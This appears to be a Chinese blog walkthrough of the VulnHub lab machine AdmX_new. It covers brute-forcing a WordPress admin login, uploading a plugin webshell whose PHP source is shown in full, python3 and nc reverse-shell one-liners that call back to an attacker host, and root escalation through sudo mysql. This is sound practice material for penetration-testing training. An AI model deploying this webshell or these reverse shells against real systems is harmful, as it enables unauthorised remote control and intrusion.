vulnhub靶机--AdmX_new

靶机下载地址:靶机下载

主机发现

通过nmap扫描得到主机IP地址
在这里插入图片描述

信息搜集

通过nmap对IP地址扫描,得到信息,只有80端口
在这里插入图片描述
然后通过浏览器访问,发现只有Ubuntu的默认页面,于是利用feroxbuster -u http://192.168.137.145:80 扫描目录,发现是WordPress框架,但有很多重定向的url
在这里插入图片描述
于是用burpsuite来抓取一下这个数据包来分析,发现这写重定向都是定向到另外一个ip
在这里插入图片描述
需要通过burpsuite里面的proxy模块的options功能,将其响应头和响应体的ip替换
在这里插入图片描述
然后重新访问,就可以正常浏览了
在这里插入图片描述
然后访问WordPress管理员页面,/wordpress/wp-admin,这里需要账号密码登录,尝试一下弱密码,不行,提示我们密码不正确,说明账号为admin
在这里插入图片描述

漏洞利用

密码采用burp爆破,爆破出密码为adam14,然后登陆进入后台,一般的WordPress获取shell有三种方式
第一种是通过Media上传shell文件,但需要特定的漏洞版本才行;
第二种是修改主题,嵌入代码,一般在404.php文件中添加shell代码,但是这里不能更新
在这里插入图片描述
第三种是通过添加自己写的插件上传

<?php
/*
Plugin Name: Webshell
Plugin URI: https://github.com/171/
Description: Wordpress Webshell for Pentest
Version: 1.0
Author: 123
Author URI: https://github.com/171/
License: https://github.com/171/
*/
if(isset($_GET['cmd']))
	{
  	system($_GET['cmd']);
	}
?>

由于上传需要zip压缩包,所以需要将1.php压缩为1.zip再上传,上传成功后需要激活
在这里插入图片描述
然后访问http://192.168.137.145/wordpress/wp-content/plugins/1.php?cmd=id,发现可以得到了id:www-data
在这里插入图片描述
接下来查看本地的环境,有nc,python3,php,尝试反弹shell,这里可以用nc x.x.x.x 1234|/bin/bash|nc x.x.x.x 4321 //在攻击主机上打开两个终端,分别监听 1234 和 4321 端口,得到反弹shell后,1234 终端 输入命令, 4321 终端就会获得执行相应命令后的结果,
和python反弹,因为只有python3环境,需要使用python3

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.152",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在这里插入图片描述
用/etc/passwd查看一下有哪些用户,发现有wpadmin,然后切换到home目录下查看用户里面的内容,发现没有权限
在这里插入图片描述

权限提升

接着尝试通过利用登录的密码切换账户,居然成功了
在这里插入图片描述
查看local.txt,应该是第一个flag,还需要获取root权限,通过sudo -l发现该用户执行数据库时不需要密码,就能得到root权限
在这里插入图片描述
但是数据库密码还需要获取,因为WordPress的目录下有个config.php,所以数据库密码应该在那个文件里面,返回刚才得到的路径查看数据库密码 Wp_Admin#123
在这里插入图片描述
登录mysql之后,里面有个system指令可以执行命令
在这里插入图片描述
执行system bash,查看proof.txt得到flag
在这里插入图片描述

成功反弹获取shell之后切换交互式shell

通过反弹得到shell,但并不是交互式shell,可以通过下面方式升级Full TTY Shell,此升级方案只适用于bash.因为这里我使用的是kali linux 要把把zsh切换为bash.
首先使用echo $SHELL查看当前shell的类型,接着使用chsh -s /bin/bash进行更改,更改后需要进行重启,重启弘我们再看shell类型发现已经是bash了
继续通过之前python反弹的shell,进行如下操作
1.输入Ctrl+Z
2.输入stty raw -echo
3.输入fg
4.输入export SHELL=/bin/bash
5.输入export TERM=screen
6.输入stty rows 38 columns 126
7.输入reset
通过以上操作后命令可以进行自动补全等功能

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ability~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值